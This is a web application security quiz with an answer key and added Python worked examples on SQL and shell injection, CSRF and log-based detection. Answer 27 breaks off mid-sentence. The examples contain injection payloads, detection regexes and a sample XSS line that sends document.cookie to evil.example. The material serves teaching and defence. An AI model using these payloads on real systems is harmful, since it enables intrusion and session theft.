Quiz: Web Application Security

A 27-question self-check covering injection, XSS, CSRF, SSRF, session security, WAFs, and detection. Questions tagged [Sec+] map to CompTIA Security+ objectives (Secure Coding / Application Attacks); [CISSP] maps to the (ISC)² CISSP Software Development Security domain. Answers and one-line explanations are at the end — try the whole quiz before checking.


Section 1 — Multiple choice (1 pt each)

1. [Sec+] The single root cause shared by SQL injection and cross-site scripting is best described as: A. weak passwords B. attacker-controlled data being interpreted as code C. missing encryption D. outdated dependencies

2. [Sec+] The correct, structural fix for SQL injection is: A. escaping single quotes B. a web application firewall C. parameterized (prepared) queries D. rejecting any input over 50 characters

3. Which XSS type is saved on the server and served to every user who views the affected content? A. reflected B. stored C. DOM-based D. blind

4. [Sec+] Which XSS type's payload commonly lives in the URL fragment and may be invisible in server-side access logs? A. stored B. reflected C. DOM-based D. persistent

5. The CSP directive that most directly defeats injected inline scripts is: A. default-src * B. script-src 'self' with no 'unsafe-inline' C. img-src 'self' D. style-src 'unsafe-inline'

6. [Sec+] CSRF works because the browser automatically attaches the victim's __ to requests sent to a site where the victim is authenticated. A. password B. session cookie C. CSP header D. user-agent

7. Which pair of controls best defends against CSRF? A. parameterized queries + WAF B. anti-CSRF tokens + SameSite cookies C. HSTS + DNSSEC D. output encoding + CSP

8. [CISSP] An attacker tricks an application server into requesting http://169.254.169.254/.... This is: A. CSRF B. reflected XSS C. SSRF D. session fixation

9. The most damaging classic consequence of SSRF in a cloud environment is: A. a defaced homepage B. theft of temporary credentials from the instance metadata endpoint C. a slow database D. a broken CSS file

10. [Sec+] Rotating (regenerating) the session ID at login specifically defeats: A. credential stuffing B. session fixation C. SQL injection D. clickjacking

11. The HttpOnly cookie flag's main security benefit is that it: A. encrypts the cookie B. prevents client-side JavaScript (including XSS) from reading the cookie C. blocks CSRF entirely D. compresses the cookie

12. [CISSP] A web application firewall is best characterized as: A. a replacement for secure coding B. defense in depth that blocks common patterns and provides telemetry C. a network-layer packet filter D. a tool that fixes vulnerabilities in source code

13. The same-origin policy makes anti-CSRF tokens effective because it prevents the attacker's page from: A. sending any request to the bank B. reading the bank's pages to steal the token C. loading images D. using HTTPS

14. [Sec+] Which is the correct fix for OS command injection? A. escape spaces in the command string B. run the command as a non-root user C. pass arguments as a list to an API that executes the program without a shell D. add a WAF rule

15. A "virtual patch" refers to: A. a code change that fixes the bug B. a WAF rule that blocks exploitation of a specific vulnerability while developers fix the code C. a browser update D. a DNS change


Section 2 — True / False with justification (1 pt each)

For each, mark T or F and give a one-sentence reason.

16. "Sanitizing inputs by removing dangerous characters is a sufficient, reliable fix for SQL injection."

17. [Sec+] "A Content Security Policy that includes 'unsafe-inline' in script-src still provides strong protection against XSS."

18. "If a state-changing endpoint is authenticated by a session cookie alone, it is a candidate for CSRF regardless of whether the body is a form or JSON."

19. "A WAF in blocking mode means you no longer need to fix the underlying SQL injection."

20. "Logout that only deletes the cookie in the browser fully protects a user whose session token was already stolen."

21. [CISSP] "Stored XSS is generally more dangerous than reflected XSS because it persists on the server and affects every user who views the content."


Section 3 — Fill in the blank (1 pt each)

22. A query in which the SQL command and the data are sent to the database separately, with placeholders for data, is called a __ query.

23. [Sec+] Converting untrusted data into a form the browser displays as literal text rather than executing as markup is called output __.

24. The browser rule that restricts how a document from one origin can read resources from another origin is the __ policy.


Section 4 — Short answer (2 pts each)

25. Explain the difference between CSRF and SSRF in terms of whose trust each abuses and who makes the malicious request.

26. [Sec+] Name the three log sources a SOC uses to detect web attacks (per §13.6) and give one attack class that each is uniquely good at surfacing.


Section 5 — Applied scenario (5 pts)

27. [CISSP] Meridian's portal has a "feedback" form whose contents are later displayed, unescaped, in an internal staff dashboard. (a) Name the specific vulnerability class and subtype. (b) Identify the asset most at risk and why (hint: whose browser runs the script). (c) Give the code-level fix and one browser-level defense-in-depth control. (d) Describe one way the SOC could detect that this is being exploited.


Answer Key

1. **B** — the data/code confusion is the unifying root cause.
2. **C** — parameterized queries fix it structurally; escaping, WAFs and length limits are partial at best.
3. **B** — stored (persistent) XSS.
4. **C** — DOM-based XSS payloads often live in the URL fragment, which the browser never sends to the server, so they are absent from access logs.
5. **B** — `script-src 'self'` with no `'unsafe-inline'` blocks injected inline scripts.
6. **B** — the browser auto-attaches the session cookie.
7. **B** — anti-CSRF tokens + `SameSite` cookies.
8. **C** — server-side request forgery to the cloud metadata IP.
9. **B** — theft of temporary credentials from the metadata endpoint (on AWS, enforcing IMDSv2, which requires a session token obtained with a PUT request, blocks the simple GET-based variant).
10. **B** — session fixation.
11. **B** — `HttpOnly` denies JavaScript (and XSS) read access to the cookie; it does not stop an injected script from using the session by sending requests from the victim's browser.
12. **B** — defense in depth + telemetry, never a replacement for secure code.
13. **B** — SOP stops the attacker reading the victim site to steal the token.
14. **C** — pass args as a list with no shell.
15. **B** — a WAF rule blocking a specific bug's exploitation while code is fixed.
16. **F** — sanitization is partial and bypassable (a numeric context such as `id = 1 OR 1=1` needs no quotes at all); parameterization is the structural fix.
17. **F** — `'unsafe-inline'` permits exactly the injected inline script XSS relies on, so protection is minimal.
18. **T** — CSRF candidacy depends on *how the request is authenticated* (auto-attached cookie), not the body's content type. A server that strictly requires `Content-Type: application/json` gets incidental protection because a cross-origin JSON POST triggers a CORS preflight, but that is a side effect of CORS rather than a CSRF control, and it is lost as soon as the server also accepts a `text/plain` body.
19. **F** — the vulnerability still exists; a WAF buys time and visibility but is bypassable, so the code must be fixed.
20. **F** — if the server still accepts the token, a thief who captured it before logout can replay it; invalidation must be server-side.
21. **T** — stored XSS persists and hits every viewer with no per-victim action.
22. parameterized (prepared).
23. encoding (escaping).
24. same-origin.
25. **CSRF** abuses the trust the *server* places in the *browser's* automatically-attached session cookie — the *victim's browser* is tricked into sending an authenticated, unintended request. **SSRF** abuses the trust/network position of the *server itself* — the *server* is tricked into making an outbound request to an attacker-chosen (often internal) destination.
26. **Web server access logs** — injection and reflected/stored-XSS *probing* (metacharacters/script-like values in the URI), plus error spikes; **WAF logs** — pre-correlated attack rule matches across many patterns; **application logs** — CSRF (rejected tokens), SSRF (resolved internal destinations), and session abuse, which look like valid HTTP to the other two. (DOM-XSS is best surfaced by CSP violation reports, an acceptable alternative answer.)
27. (a) **Stored (persistent) XSS**. (b) The **staff/admin browser** (and the privileges/session it holds) is most at risk, because the script executes in the context of an internal, likely higher-privileged user viewing the dashboard — escalating a customer-supplied input into staff-context code execution. (c) **Fix:** context-aware **output encoding** at the point the feedback is rendered (auto-escaping template); **browser defense in depth:** a strict **CSP** (`script-src 'self'`, no `'unsafe-inline'`) on the dashboard so an injected inline script is blocked and reported, and `HttpOnly` on the staff session cookie so a script that does run cannot steal the cookie. (d) **Detection:** periodically scan the stored feedback field for script-like content (`
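Worked example for answers 1, 2, 14, 16 and 22 (added here; it is not part of the quiz or its source text). It runs the quote-stripping "sanitizer" of question 16 against a numeric SQL context on an in-memory SQLite database, shows the parameterized fix, and repeats the same data/code confusion with a shell command. The users table, the attacker inputs and the use of `echo` as the target program are constructed for this illustration.

```python
"""Added worked example: the "data interpreted as code" root cause behind quiz
questions 1, 2, 14, 16 and 22, on an in-memory SQLite database and a local
echo subprocess. The users table, the quote-stripping "sanitizer" and the
attacker inputs are constructed for this example (assumes a POSIX shell)."""
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def strip_quotes(value: str) -> str:
    """The 'sanitizer' of question 16: removes single quotes and nothing else.
    It is useless in a numeric context, where the payload needs no quotes."""
    return value.replace("'", "")


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the (sanitized) input is spliced into the SQL text, so SQL
    keywords inside the *data* are parsed as part of the *command*."""
    sql = f"SELECT name FROM users WHERE id = {strip_quotes(user_id)}"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Structural fix (questions 2 and 22): the command carries a placeholder
    and the data is bound separately, so it can never change the query shape.
    '1 OR 1=1' is compared as one opaque value and matches no row."""
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return [row[0] for row in rows]


def run_vulnerable(arg: str) -> str:
    """Vulnerable: shell=True hands one string to /bin/sh, so ';' inside the
    data becomes a command separator (same confusion, different parser)."""
    proc = subprocess.run("echo " + arg, shell=True, capture_output=True, text=True)
    return proc.stdout


def run_fixed(arg: str) -> str:
    """Fix (question 14): an argv list and no shell; the argument reaches the
    program as a single token, metacharacters included."""
    proc = subprocess.run(["echo", arg], capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    db = make_db()
    payload = "1 OR 1=1"  # no quotes, so strip_quotes() leaves it untouched
    print("vulnerable:", lookup_vulnerable(db, payload))        # every user
    print("parameterized:", lookup_parameterized(db, payload))  # []
    print("parameterized, honest input:", lookup_parameterized(db, "1"))  # ['alice']
    cmd_payload = "hello; echo INJECTED"
    print("shell=True:", run_vulnerable(cmd_payload).splitlines())  # ['hello', 'INJECTED']
    print("argv list:", run_fixed(cmd_payload).splitlines())        # ['hello; echo INJECTED']
```

The point of the numeric case is that there is nothing for a character filter to remove; only binding the value as data, not text, removes the ambiguity. The same holds for the argv list: the shell is never asked to parse the string, so it cannot find a separator in it.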
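Worked example for answers 6, 7, 13 and 18 (added here; not part of the quiz or its source text). It is a small model of the browser and server behaviour that CSRF depends on: a cookie jar that applies the SameSite rules when a page on one site sends a request to another, and a bank server that authenticates by session cookie alone and optionally demands a per-session anti-CSRF token. The site names `bank.example` and `evil.example`, the `/transfer` semantics and the token handling are constructed for the illustration and simplified to the rules that matter here.

```python
"""Added worked example: a minimal model of why the auto-attached session
cookie enables CSRF (question 6) and how anti-CSRF tokens and SameSite
cookies stop it (questions 7, 13, 18). bank.example and evil.example are
constructed names; only SameSite attachment and token comparison are modelled."""
import secrets
from dataclasses import dataclass, field

BANK = "bank.example"      # constructed victim site
ATTACKER = "evil.example"  # constructed attacker site


@dataclass
class Cookie:
    value: str
    same_site: str = "Lax"  # "Strict", "Lax" or "None" (None also requires Secure)


@dataclass
class Browser:
    """Keeps a cookie jar per site and applies the SameSite rules when a page
    on `initiator` sends a request to `target` (question 6)."""
    jar: dict = field(default_factory=dict)

    def set_cookie(self, site: str, name: str, cookie: Cookie) -> None:
        self.jar.setdefault(site, {})[name] = cookie

    def request(self, initiator: str, target: str, method: str, params: dict,
                top_level_navigation: bool = False) -> dict:
        cookies = {}
        for name, c in self.jar.get(target, {}).items():
            if initiator == target or c.same_site == "None":
                cookies[name] = c.value  # same-site, or SameSite=None: always attached
            elif c.same_site == "Lax" and method == "GET" and top_level_navigation:
                cookies[name] = c.value  # Lax: cross-site only on top-level GET navigations
            # Strict: never cross-site. Lax: not on cross-site POST or subresource loads.
        return {"method": method, "params": params, "cookies": cookies}


class BankServer:
    """Authenticates every request by its session cookie alone (question 18)
    and, when configured, also demands the per-session token (question 7)."""

    def __init__(self, require_token: bool) -> None:
        self.require_token = require_token
        self.sessions: dict = {}
        self.transfers: list = []

    def login(self, browser: Browser, user: str, same_site: str) -> str:
        sid, token = secrets.token_hex(16), secrets.token_hex(16)
        self.sessions[sid] = {"user": user, "csrf": token}
        browser.set_cookie(BANK, "session", Cookie(sid, same_site))
        # The token is rendered into the bank's own pages; the same-origin
        # policy keeps evil.example from reading it there (question 13).
        return token

    def transfer(self, req: dict) -> str:
        sess = self.sessions.get(req["cookies"].get("session"))
        if sess is None:
            return "401 no session"
        if self.require_token and req["params"].get("csrf") != sess["csrf"]:
            return "403 bad csrf token"
        self.transfers.append((sess["user"], req["params"]["to"], req["params"]["amount"]))
        return "200 ok"


def forged_post(browser: Browser, server: BankServer) -> str:
    """A page on evil.example auto-submits a POST; it cannot read the bank's
    pages, so the best it can do for the token is guess."""
    req = browser.request(ATTACKER, BANK, "POST",
                          {"to": "mallory", "amount": 1000, "csrf": "guess"})
    return server.transfer(req)


def scenario(require_token: bool, same_site: str) -> tuple:
    """Returns (legitimate result, forged result) for one defence configuration."""
    browser, server = Browser(), BankServer(require_token)
    token = server.login(browser, "alice", same_site)
    legit = server.transfer(browser.request(BANK, BANK, "POST",
                                            {"to": "bob", "amount": 10, "csrf": token}))
    return legit, forged_post(browser, server)


def lax_get_gap() -> str:
    """Caveat to SameSite=Lax: a state change reachable by GET is still exposed
    through a cross-site top-level navigation (a link or redirect)."""
    browser, server = Browser(), BankServer(require_token=False)
    server.login(browser, "alice", "Lax")
    req = browser.request(ATTACKER, BANK, "GET", {"to": "mallory", "amount": 1000},
                          top_level_navigation=True)
    return server.transfer(req)


if __name__ == "__main__":
    print("no token, SameSite=None  :", scenario(False, "None"))    # ('200 ok', '200 ok')
    print("token,    SameSite=None  :", scenario(True, "None"))     # ('200 ok', '403 bad csrf token')
    print("no token, SameSite=Lax   :", scenario(False, "Lax"))     # ('200 ok', '401 no session')
    print("no token, SameSite=Strict:", scenario(False, "Strict"))  # ('200 ok', '401 no session')
    print("Lax + GET state change   :", lax_get_gap())              # '200 ok'
```

The four `scenario` calls are the quiz's argument in executable form: with neither control the forged request is indistinguishable from the real one; the token works because the attacker cannot read it, and SameSite works because the cookie is not attached. `lax_get_gap` is the caveat a reviewer would raise on "SameSite=Lax is enough": it is, only if no state change is reachable by GET.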
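Worked example for answer 26 and part (d) of answer 27 (added here; not part of the quiz or its source text). It runs simple probe detection over a few access-log lines, counts the CSRF and SSRF rejections that only the application log can show, and scans a stored feedback field for script-like content. All log lines and feedback rows are constructed for this example, and the regular expressions are illustrative rather than a production ruleset; in particular the `on...=` handler pattern needs the word boundary shown, or ordinary parameters such as `confirmation=1` trip it.

```python
"""Added worked example: detection logic for quiz question 26 and 27(d), run
over constructed log lines. The access-log, application-log and stored-feedback
samples are made up for this example; the patterns are illustrative only."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: web server access log (common log format).
ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /items?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /items?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /items?id=1%20UNION%20SELECT%20null,version() HTTP/1.1" 500 0
198.51.100.4 - - [10/Oct/2024:13:56:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 900
192.0.2.9 - - [10/Oct/2024:13:57:12 +0000] "GET /search?q=confirmation=1 HTTP/1.1" 200 870
"""

# Constructed sample: application log. CSRF rejections and SSRF blocks look like
# ordinary HTTP to the web server and the WAF; only the application knows.
APP_LOG = """\
2024-10-10T13:58:00Z WARN csrf token mismatch user=alice path=/transfer src=203.0.113.7
2024-10-10T13:58:02Z WARN csrf token mismatch user=alice path=/transfer src=203.0.113.7
2024-10-10T13:58:05Z INFO transfer ok user=bob path=/transfer src=192.0.2.9
2024-10-10T13:58:09Z WARN ssrf blocked dest=169.254.169.254 path=/fetch src=203.0.113.7
"""

# Constructed sample: rows of the stored "feedback" field from question 27.
STORED_FEEDBACK = [
    "Great service, thanks!",
    "Love the new layout <3",
    '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">',
    "<b>Bold</b> claim: the portal is slow on Mondays",
]

ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
# Applied to the URL-decoded URI; otherwise %27 and friends hide the metacharacters.
SQLI_PROBES = re.compile(r"'\s*(or|and)\s|union\s+select|;\s*drop\b", re.IGNORECASE)
# \bon\w+\s*= needs the word boundary so "?confirmation=1" is not an event handler.
XSS_PROBES = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)


def classify_access(line: str) -> tuple:
    """Returns (src, tags) for one access-log line; tags is a set of probe classes."""
    m = ACCESS_RE.match(line)
    if not m:
        return None, set()
    uri = unquote(m.group("uri"))
    tags = set()
    if SQLI_PROBES.search(uri):
        tags.add("sqli")
    if XSS_PROBES.search(uri):
        tags.add("xss")
    return m.group("src"), tags


def detect_access(log_text: str) -> Counter:
    """Counts (src, probe class) pairs across the access log."""
    hits = Counter()
    for line in log_text.splitlines():
        src, tags = classify_access(line)
        for tag in tags:
            hits[(src, tag)] += 1
    return hits


def detect_app(log_text: str) -> Counter:
    """Counts application-level rejections that the other two sources cannot see."""
    hits = Counter()
    for line in log_text.splitlines():
        src = re.search(r"\bsrc=(\S+)", line)
        if src is None:
            continue
        if "csrf token mismatch" in line:
            hits[(src.group(1), "csrf_reject")] += 1
        elif "ssrf blocked" in line:
            hits[(src.group(1), "ssrf_block")] += 1
    return hits


def scan_stored(records: list) -> list:
    """Question 27(d): indexes of stored feedback rows holding script-like content."""
    return [i for i, text in enumerate(records) if XSS_PROBES.search(text)]


def suspicious_sources(threshold: int = 2) -> list:
    """Sources whose access-log probes plus app-log rejections reach the threshold."""
    totals = Counter()
    for (src, _tag), n in list(detect_access(ACCESS_LOG).items()) + list(detect_app(APP_LOG).items()):
        totals[src] += n
    return sorted(src for src, n in totals.items() if n >= threshold)


if __name__ == "__main__":
    print(dict(detect_access(ACCESS_LOG)))  # {('203.0.113.7', 'sqli'): 2, ('198.51.100.4', 'xss'): 1}
    print(dict(detect_app(APP_LOG)))        # {('203.0.113.7', 'csrf_reject'): 2, ('203.0.113.7', 'ssrf_block'): 1}
    print(scan_stored(STORED_FEEDBACK))     # [2]
    print(suspicious_sources())             # ['203.0.113.7']
```

Note what each source contributes: the access log shows the injection and XSS probing (and the 500s they caused), but the two rejected transfers and the blocked metadata fetch are plain 4xx/200 responses there and in WAF telemetry; only the application log names them. Correlating all of it by source address is what turns five scattered lines into one actor worth a ticket.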